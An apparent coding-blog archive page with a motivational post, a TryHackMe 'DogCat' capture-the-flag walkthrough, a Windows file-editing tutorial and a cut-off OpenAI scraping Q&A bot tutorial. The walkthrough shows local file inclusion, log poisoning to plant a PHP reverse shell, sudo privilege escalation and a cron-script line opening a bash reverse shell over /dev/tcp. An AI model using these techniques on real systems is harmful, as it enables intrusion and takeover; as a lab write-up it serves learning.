Programming – Page 17

Posted on March 6, 2023 by sick skills — Leave a comment

Cracking the Code to a Better Life: How Learning to Code Can Satisfy the 8 Life Forces

5/5 – (1 vote)

As human beings, we are driven by a number of basic needs and desires that motivate us to take action and pursue our goals. This includes things like survival, enjoyment of life, sexual companionship, comfortable living conditions, and more.

I believe learning to code is a powerful way to satisfy many of these profound life forces. Let’s go over them one by one as a small exercise to keep you motivated for the week!

Life Forces #1 – Survival, Enjoyment of Life, Life Extension

By learning to code, you can position yourself to take advantage of the many job opportunities that exist in the tech industry, which can provide you with the financial resources you need to support yourself and your loved ones.

The median annual income of a software developer in the US is $120,730, compared to a median income overall of $41,535. No need to say more on this point!

Recommended: Income of Freelance Developer

Additionally, coding can be a fun and rewarding hobby that can help you stay mentally sharp and engaged with the world around you.

Life Forces #2 – Comfortable Living Conditions

By developing skills in programming, prompting, tech, blockchain development, and machine learning, you can position yourself to take advantage of the many high-paying job opportunities that exist in these fields, which can help you achieve the comfortable living conditions you desire.

Life Forces #3 – To Be Superior and Winning

Don’t underestimate the motivational power of this basic need of human beings!

By mastering the latest programming languages, tools, and techniques, you can position yourself as an expert in your field and achieve a sense of superiority and accomplishment that can drive you to greater success.

Imagine being able to command the power of infinite leverage by programming computers. Wouldn’t controlling an army of artificially intelligent entities help you win?

Life Forces #4 – Sexual Companionship

While learning to code may not directly impact your ability to find sexual companionship, it can provide you with the financial resources and independence you need to pursue romantic relationships on your own terms.

It’s also a status game, after all.

In researching this hypotheses for the purpose of this post, I came across lots of scientifical evidence on this topic such as Zhang 2022:

“We found that men with higher social status were more likely to have long-term mating and reproductive success”

DYR!

Life Forces #5 – Freedom From Fear, Pain, and Danger

By achieving financial security and stability through your coding skills, you can achieve a sense of freedom from fear, pain, and danger that can allow you to pursue your dreams and passions without undue worry or stress.

In fact, creating my own coding business online — starting out as a freelance developer on Upwork — has given me all the freedom I ever dreamed of!

Recommended: Read my story here

Life Forces #6 – Care And Protection of Loved Ones

By achieving financial success through your coding skills, you can provide for and protect your loved ones, ensuring they have the resources and security they need to thrive.

Life Forces #7 – Social Approval

By mastering programming, tech, blockchain development, and machine learning skills, you can achieve a sense of social approval and validation from your peers and colleagues, who will respect and admire your expertise and achievements.

Conclusion

In short, learning to code can satisfy many of the life forces that drive us as human beings, and can provide you with the skills and resources you need to achieve success and fulfillment in all areas of your life.

If you’re looking to take your career and life to the next level, I encourage you to check out our academy‘s courses on programming, tech, blockchain development, ChatGPT, freelancing, and machine learning. They can help you achieve your goals and create the life you’ve always dreamed of.

Thank you for being a part of our community, and we look forward to supporting you on your journey to success and fulfillment.

Posted on March 5, 2023 by sick skills — Leave a comment

TryHackMe DogCat Walkthrough [+ Easy Video]

5/5 – (1 vote)

CHALLENGE OVERVIEW

Link: THM Dogcat
Difficulty: Medium
Target: Flags 1-4
Highlight: intercepting and modifying a web request using burpsuite
Tools used: base64, burpsuite
Tags: docker, directory traversal

BACKGROUND

In this tutorial, we will walk a simple website showing pictures of dogs and cats.

We’ll discover a directory traversal vulnerability that we can leverage to view sensitive files on the target machine.

At the end of this challenge, we will break out of a docker container in order to capture the 4th and final flag.

ENUMERATION/RECON

export target=10.10.148.135
Export myIP=10.6.2.23

Let’s walk the site.

It looks like a simple image-viewing site that can randomize images of dogs and cats. After toying around with the browser addresses, we find that directory traversal allows us to view other files.

Let’s see if we can grab the HTML code that processes our parameters in the browser address. This will help us understand what is happening on the backend.

We’ll use a simple PHP filter to convert the contents to base64 and output the raw base64 string.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../index

Raw output:

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg==

Let’s save this string as a file named “string”. Then we can use the command “cat string | base64 -d” to decrypt this string and view it as raw HTML code.

Reading over this HTML code, we can see that the file extension can be set!

If the user doesn’t specify the extension, the default will be .php. This means that we can add “&ext=” to the end of our web address to avoid the .php extension from being added.

In order for it to properly display our request, we need to include the word “dog” or “cat” in the address.

Let’s dive in with burpsuite and start intercepting and modifying requests.

Here is our order of steps for us to get our initial foothold on the target machine:

Create a PHP reverse shell
Start up our netcat listener
Use burp to intercept and modify the web request. Wait until later to click “forward”.
Spin up a simple HTTP server with Python in the same directory as the PHP revshell.
Click “forward” on burp to send the web request.
Activate the shell by entering: $targetIP/bshell.php in the browser address
Catch the revshell on netcat!

STEP 1

Let’s create a PHP pentest monkey revshell.

STEP 2

Let’s first start up a netcat listener on port 2222.

nc -lnvp 2222

STEP 3

Intercept the web request for the Apache2 log and modify the User-Agent field with a PHP code to request the shell.php code and rename it bshell.php on the target machine.

This will work only because upon examining the Apache2 logs, we noticed that the User-Agent field is unencoded and vulnerable to command injection. Make sure to wait to click forward until step 5.

STEP 4

We’ll spin up a simple python HTTP server in the same directory as our revshell to serve shell.php to our target machine via the modified web request we created in burpsuite.

STEP 5

Click forward on burp and check to see if code 200 came through for shell.php on the HTTP server.

STEP 6

We can activate the shell from our browser now and hopefully catch it as a revshell on our netcat listener.

STEP 7

We successfully caught it! Now we are in with our initial foothold!

INITIAL FOOTHOLD

LOCATE THE FIRST FLAG

Let’s grab the first flag. We can grab it from our browser again in base64, or via the command line from the revshell.

http://10.10.148.135/?view=php://filter/read=convert.base64-encode/resource=./dog/../flag
PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=

Now we can decode this string (saved as firstflag.txt) with base64:

base64 --decode firstflag.txt <?php
$flag_1 = "THM{Th—------------ommitted—-------fa}"
?>

LOCAL RECON

LOCATE THE SECOND FLAG

We manually enumerate the filesystem and discover the second flag at /var/www/flag2_QMW7JvaY2LvK.txt

Using the command find can help us quickly scan the filesystem for any files which contain the word “flag”.

find / -type f -name '*flag*' 2>/dev/null

We found the second flag in plaintext!

cat flag2_QMW7JvaY2LvK.txt
THM{LF—------------ommitted—-------fb}

CHECK SUDO PERMISSIONS

Let’s check out our sudo permissions with the command:

sudo -l
Matching Defaults entries for www-data on 26e23794a52b: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on 26e23794a52b: (root) NOPASSWD: /usr/bin/env

EXPLOIT/PRIVILEGE ESCALATION

Because we have sudo permissions without a password to run the env bin, we can easily become root with the command:

$ sudo env /bin/bash

Now we can verify that we are root with the command whoami.

GRAB THE THIRD FLAG

cd /root
ls
flag3.txt
cat flag3.txt
THM{D1—------------ommitted—-------12}

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

Let’s start up a new listener to catch the new bash shell outside of the container.

nc -lnvp 3333

We notice that there is a backup.sh that regularly runs on a schedule via cronjobs. We can hijack this file which is run by root outside of the docker container, by changing the contents to throw a revshell.

echo "#!/bin/bash">backup.sh;echo "bash -i>/dev/tcp/10.6.2.23/3333 0>&1">>backup.sh
flag4.txt
cat flag4.txt
THM{esc—------------ommitted—-------2d}

FINAL THOUGHTS

This box was a lot of fun. The bulk of the challenge was working towards gaining the initial foothold.

Once we secured a revshell, the rest of the box went pretty quickly.

The final step of breaking out of a docker container with a second revshell was the sneakiest part for me.

The PHP directory traversal and using a php filter to encode with base64 was also a cool way to evade the data sanitation measures in place on the backend.

Posted on March 4, 2023 by sick skills — Leave a comment

5 Easy Ways to Edit a Text File From Command Line (Windows)

5/5 – (1 vote)

Problem Formulation

Given is a text file, say my_file.txt. How to modify its content in your Windows command line working directory?

I’ll start with the most direct method to solve this problem in 90% of cases and give a more “pure” in-terminal method afterward.

Method 1: Using Notepad

The easiest way to edit a text file in the command line (CMD) on your Windows machine is to run the command notepad.exe my_text_file.txt, or simply notepad my_text_file.txt, in your cmd to open the text file with the visual editor Notepad.

notepad.exe my_file.txt

You can also skip the .exe prefix in most cases:

notepad my_text_file.txt

Now, you may ask:

Is Notepad preinstalled in any Windows installation? The answer is: yes! Notepad is a generic text editor to create, open, and read plaintext files and it’s included with all Windows versions.

Here’s how that looks on my Win 10 machine:

When I type in the command notepad.exe my_text_file.txt, CMD starts the Notepad visual editor in a new window.

I can then edit the file and hit CTRL + S to save the new contents.

But what if you cannot open a text editor—e.g. if you’re logged into a remote server via SSH?

Method 2: Pure CMD Approach

If you cannot open Notepad or other visual editors for some reason, a simple way to overwrite a text file with built-in Windows command line tools is the following:

Run the command echo 'your new content' > my_file.txt to print the new content using echo and pipe the output into the text file my_text_file.txt using >.
Check the new content using the command type my_text_file.txt.

C:\Users\xcent\Desktop>echo 'hello world' > my_file.txt
C:\Users\xcent\Desktop>type my_file.txt 'hello world'

Here’s what this looks like on my Windows machine, where I changed my_file.txt to contain the text 'hello world!':

This is a simple and straightforward approach to small changes. However, if you have a large file and you just want to edit some minor details, this is not the best way.

Method 3: Change File Purely In CMD (Copy Con)

If you need a full-fledged solution to edit potentially large files in your Windows CMD, use this method!

To create a new file in Windows command prompt, enter copy con followed by the target file name (copy con my_file.txt). Then enter the text you want to put in the file. To end and save the file, press Ctrl+Z then Enter or F6 then Enter.

copy con my_file.txt

How this looks on my Win machine:

A couple of notes:

Info: To edit an existing file, display the text by using the type command followed by the file name. Then copy and paste the text into the copy con command to make changes. Be careful not to make any typos, or you’ll have to start over again. Backspace works if you catch the mistake before pressing Enter. Note that this method may not work in PowerShell or other command line interfaces that don’t support this feature.

Method 4: If you SSH’d to a Unix Machine

Of course, if you have logged in a Unix-based machine, you don’t need to install any editor because it comes with powerful integrated editors such as vim or emacs.

One of the following three commands should open your file in a terminal-based editing mode:

vim my_text_file.txt
vi my_text_file.txt
emacs my_text_file.txt

You can learn more about Vim here.

Summary

To edit a file.txt in the command line, use the command notepad file.txt to open a graphical editor on Windows.

If you need a simple file edit in your terminal without a graphical editor and without installation, you can use the command echo 'new content' > file.txt that overwrites the old content in file.txt with new content.

If you need a more direct in-CMD text editor run copy con file.txt to open the file in editing mode.

If you’re SSH’d into a Unix machine, running the Vim console-based editor may be the best idea. Use vim file.txt or vi file.txt to open it.

Feel free to join our email coding academy (it’s free):

Posted on March 2, 2023 by sick skills — Leave a comment

Building a Q&A Bot with OpenAI: A Step-by-Step Guide to Scraping Websites and Answer Questions

5/5 – (2 votes)

Have you ever found yourself deep in the internet rabbit hole, searching for an answer to a question that just won’t quit?

It can be frustrating to sift through all the online information and still come up empty-handed. But what if there was a way to get accurate and reliable answers in a snap? Enter the Q&A bot – your new best friend for all your pressing questions!

In this blog, we will take you on a wild ride to show you how to build your very own Q&A bot using OpenAI’s language models. We’ll guide you through the process of scraping text from a website, processing it, and using OpenAI’s language models to find the answers you seek.

And let’s face it, who doesn’t love having a robot friend that can answer all their burning questions? So buckle up and let’s build a quirky, lovable Q&A bot together!

You can check out the whole code project on the GitHub (cookbook). I’ll explain the steps in the following

Overview

This tutorial presents a Python script that

crawls a website,
extracts the text from the webpages,
tokenizes the text, and
creates embeddings for each text (quick explanation on “embeddings” below).

It then uses OpenAI’s API to answer questions based on the embeddings of the text.

You will need to create your own API key in case you want to try it yourself.

You should also install the openai library — I’ve written a blog tutorial on this too:

Recommended: How to Install OpenAI in Python?

Scroll down to the whole code section if you want to try it by copy&paste.

Step 1

This section of the code imports the necessary Python libraries for the script, including requests for sending HTTP requests, re for regular expressions, urllib.request for opening URLs, BeautifulSoup for parsing HTML and XML, deque for creating a queue, HTMLParser for parsing HTML, urlparse for parsing URLs, os for interacting with the operating system, pandas for working with dataframes, tiktoken for getting a tokenizer, and openai for creating embeddings and answering questions.

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"])

Step 2

This section of the code defines a function called get_hyperlinks that takes a URL as input, tries to open the URL and read the HTML, and then parses the HTML to get hyperlinks. If the response is not HTML, it returns an empty list.

################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks

Step 3

This section of the code defines a function called get_domain_hyperlinks that takes a domain and a URL as input and returns a list of hyperlinks from the URL that are within the same domain. If the hyperlink is a URL, it checks if it is within the same domain. If the hyperlink is not a URL, it checks if it is a relative link.

################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links))

Step 4

This section of the code defines a function called crawl that takes a URL as input, parses the URL to get the domain, creates a queue to store the URLs to crawl, creates a set to store the URLs that have already been seen (no duplicates), and creates a directory to store the text files. It then continues crawling until the queue is empty, saving the text from each URL to a text file, and getting the hyperlinks from each URL and adding them to the queue.

################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url)

Step 5

This section of the code defines a function called remove_newlines that takes a pandas Series object as input, replaces newlines with spaces, and returns the modified Series.

################################################################################
### Step 5
################################################################################ def remove_newlines(serie): serie = serie.str.replace('\n', ' ') serie = serie.str.replace('\\n', ' ') serie = serie.str.replace(' ', ' ') serie = serie.str.replace(' ', ' ') return serie

Step 6

This section of the code creates a list called texts to store the text files, gets all the text files in the text directory, opens each file, reads the text, omits the first 11 lines and the last 4 lines, replaces -, _, and #update with spaces, and appends the modified text to the list of texts. It then creates a dataframe from the list of texts, sets the text column to be the raw text with the newlines removed, and saves the dataframe as a CSV file.

################################################################################
### Step 6
################################################################################ # Create a list to store the text files
texts=[] # Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"): # Open the file and read the text with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f: text = f.read() # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces. texts.append((file[11:-4].replace('-',' ').replace('_', ' ').replace('#update',''), text)) # Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns = ['fname', 'text']) # Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

Step 7

This section of the code loads a tokenizer and applies it to the text column of the dataframe to get the number of tokens for each row. It then creates a histogram of the number of tokens per row.

################################################################################
### Step 7
################################################################################ # Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base") df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text'] # Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x))) # Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

Step 8

This section of the code defines a maximum number of tokens, creates a function called split_into_many that takes text and a maximum number of tokens as input and splits the text into chunks of a maximum number of tokens.

It then loops through the dataframe and either adds the text to the list of shortened texts or splits the text into chunks of a maximum number of tokens and adds the chunks to the list of shortened texts.

################################################################################
### Step 8
################################################################################ max_tokens = 500 # Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens = max_tokens): # Split the text into sentences sentences = text.split('. ') # Get the number of tokens for each sentence n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences] chunks = [] tokens_so_far = 0 chunk = [] # Loop through the sentences and tokens joined together in a tuple for sentence, token in zip(sentences, n_tokens): # If the number of tokens so far plus the number of tokens in the current sentence is greater # than the max number of tokens, then add the chunk to the list of chunks and reset # the chunk and tokens so far if tokens_so_far + token > max_tokens: chunks.append(". ".join(chunk) + ".") chunk = [] tokens_so_far = 0 # If the number of tokens in the current sentence is greater than the max number of # tokens, go to the next sentence if token > max_tokens: continue # Otherwise, add the sentence to the chunk and add the number of tokens to the total chunk.append(sentence) tokens_so_far += token + 1 return chunks shortened = [] # Loop through the dataframe
for row in df.iterrows(): # If the text is None, go to the next row if row[1]['text'] is None: continue # If the number of tokens is greater than the max number of tokens, split the text into chunks if row[1]['n_tokens'] > max_tokens: shortened += split_into_many(row[1]['text']) # Otherwise, add the text to the list of shortened texts else: shortened.append( row[1]['text'] )

Step 9

This section of the code creates a new dataframe from the list of shortened texts, applies the tokenizer to the text column of the dataframe to get the number of tokens for each row, and creates a histogram of the number of tokens per row.

################################################################################
### Step 9
################################################################################ df = pd.DataFrame(shortened, columns = ['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

Step 10

Step 10 involves using OpenAI’s language model to embed the text into vectors. This allows the model to analyze the text and make predictions based on its content. The openai.Embedding.create() function is used to create the embeddings, and they are saved in a new column in the DataFrame.

################################################################################
### Step 10
################################################################################ # Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

Step 11

Step 11 involves loading the embeddings from the DataFrame and converting them to numpy arrays.

################################################################################
### Step 11
################################################################################ df=pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array) df.head()

Step 12

Step 12 includes the create_context() and answer_question() functions that use the embeddings to find the most similar context to a question and then answer it based on that context. These functions leverage OpenAI’s language models and the embeddings created in Step 10 to provide accurate and reliable answers. The create_context() function creates the context based on the question and the embeddings, while the answer_question() function uses the context and question to generate a response using OpenAI’s GPT-3 language model.

################################################################################
### Step 12
################################################################################ def create_context( question, df, max_len=1800, size="ada"
): """ Create a context for a question by finding the most similar context from the dataframe """ # Get the embeddings for the question q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding'] # Get the distances from the embeddings df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine') returns = [] cur_len = 0 # Sort by distance and add the text to the context until the context is too long for i, row in df.sort_values('distances', ascending=True).iterrows(): # Add the length of the text to the current length cur_len += row['n_tokens'] + 4 # If the context is too long, break if cur_len > max_len: break # Else add it to the text that is being returned returns.append(row["text"]) # Return the context return "\n\n###\n\n".join(returns) def answer_question( df, model="text-davinci-003", question="Am I allowed to publish model outputs to Twitter, without a human review?", max_len=1800, size="ada", debug=False, max_tokens=150, stop_sequence=None
): """ Answer a question based on the most similar context from the dataframe texts """ context = create_context( question, df, max_len=max_len, size=size, ) # If debug, print the raw model response if debug: print("Context:\n" + context) print("\n\n") try: # Create a completions using the questin and context response = openai.Completion.create( prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:", temperature=0, max_tokens=max_tokens, top_p=1, frequency_penalty=0, presence_penalty=0, stop=stop_sequence, model=model, ) return response["choices"][0]["text"].strip() except Exception as e: print(e) return ""

Step 13

Step 13 provides an example of using the answer_question() function to answer two different questions. The first question is a simple one, while the second question requires more specific knowledge. This example demonstrates the versatility of the Q&A bot and its ability to answer a wide range of questions.

################################################################################
### Step 13
################################################################################ print(answer_question(df, question="What day is it?", debug=False)) print(answer_question(df, question="What is our newest embeddings model?"))

Putting It All Together

You can check out the whole code project on the GitHub or simply copy and paste it from here:

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"]) ################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks ################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links)) ################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url) ################################################################################
### Step 5
################################################################################ def remove_newlines(serie): serie = serie.str.replace('\n', ' ') serie = serie.str.replace('\\n', ' ') serie = serie.str.replace(' ', ' ') serie = serie.str.replace(' ', ' ') return serie ################################################################################
### Step 6
################################################################################ # Create a list to store the text files
texts=[] # Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"): # Open the file and read the text with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f: text = f.read() # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces. texts.append((file[11:-4].replace('-',' ').replace('_', ' ').replace('#update',''), text)) # Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns = ['fname', 'text']) # Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head() ################################################################################
### Step 7
################################################################################ # Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base") df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text'] # Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x))) # Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist() ################################################################################
### Step 8
################################################################################ max_tokens = 500 # Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens = max_tokens): # Split the text into sentences sentences = text.split('. ') # Get the number of tokens for each sentence n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences] chunks = [] tokens_so_far = 0 chunk = [] # Loop through the sentences and tokens joined together in a tuple for sentence, token in zip(sentences, n_tokens): # If the number of tokens so far plus the number of tokens in the current sentence is greater # than the max number of tokens, then add the chunk to the list of chunks and reset # the chunk and tokens so far if tokens_so_far + token > max_tokens: chunks.append(". ".join(chunk) + ".") chunk = [] tokens_so_far = 0 # If the number of tokens in the current sentence is greater than the max number of # tokens, go to the next sentence if token > max_tokens: continue # Otherwise, add the sentence to the chunk and add the number of tokens to the total chunk.append(sentence) tokens_so_far += token + 1 return chunks shortened = [] # Loop through the dataframe
for row in df.iterrows(): # If the text is None, go to the next row if row[1]['text'] is None: continue # If the number of tokens is greater than the max number of tokens, split the text into chunks if row[1]['n_tokens'] > max_tokens: shortened += split_into_many(row[1]['text']) # Otherwise, add the text to the list of shortened texts else: shortened.append( row[1]['text'] ) ################################################################################
### Step 9
################################################################################ df = pd.DataFrame(shortened, columns = ['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist() ################################################################################
### Step 10
################################################################################ # Note that you may run into rate limit issues depending on how many files you try to embed
